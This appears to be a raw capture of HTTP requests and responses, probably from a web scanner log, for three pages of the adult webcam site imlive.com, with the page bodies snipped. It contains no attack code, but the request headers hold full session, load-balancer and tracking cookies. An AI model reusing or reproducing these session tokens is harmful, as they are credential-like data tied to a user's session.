HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:23:00 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2FSf8bs6wRlvXx1sFag%3D%3D; path=/ Set-Cookie: ix=k; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:23:00 GMT Connection: close Content-Length: 23768 Vary: Accept-Encoding
<html> <head> <title> Live Sex Chat Categories at ImLive </title> <meta name="description" content="Live sex chat with girls, lesbians, gays, couples, threesomes and fetish lovers. CO ...[SNIP]...
GET /sitemap.html HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:23:00 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2FSf8bs6wRlvXx1sFag%3D%3D; path=/ Set-Cookie: ix=k; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:23:00 GMT Connection: close Content-Length: 33732 Vary: Accept-Encoding
<html> <head> <meta name="keywords" content="live Video Chat, Video Chat live, Video Chat live, live Video Chat, webcam chat, live web cam, webcam live, live webcam, web cam live, web cam communti ...[SNIP]...
GET /videosfr.asp HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:11:20 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmuTmCT55rdh7t3zZ04MFTzw; path=/ X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:11:21 GMT Connection: close Content-Length: 15706 Vary: Accept-Encoding
<html> <head> <title>Video Chat Recorded on Webcam at ImLive</title> <meta name="description" content="Come in and discover what our hosts have recorded in Friends & Romance live webcam vide ...[SNIP]...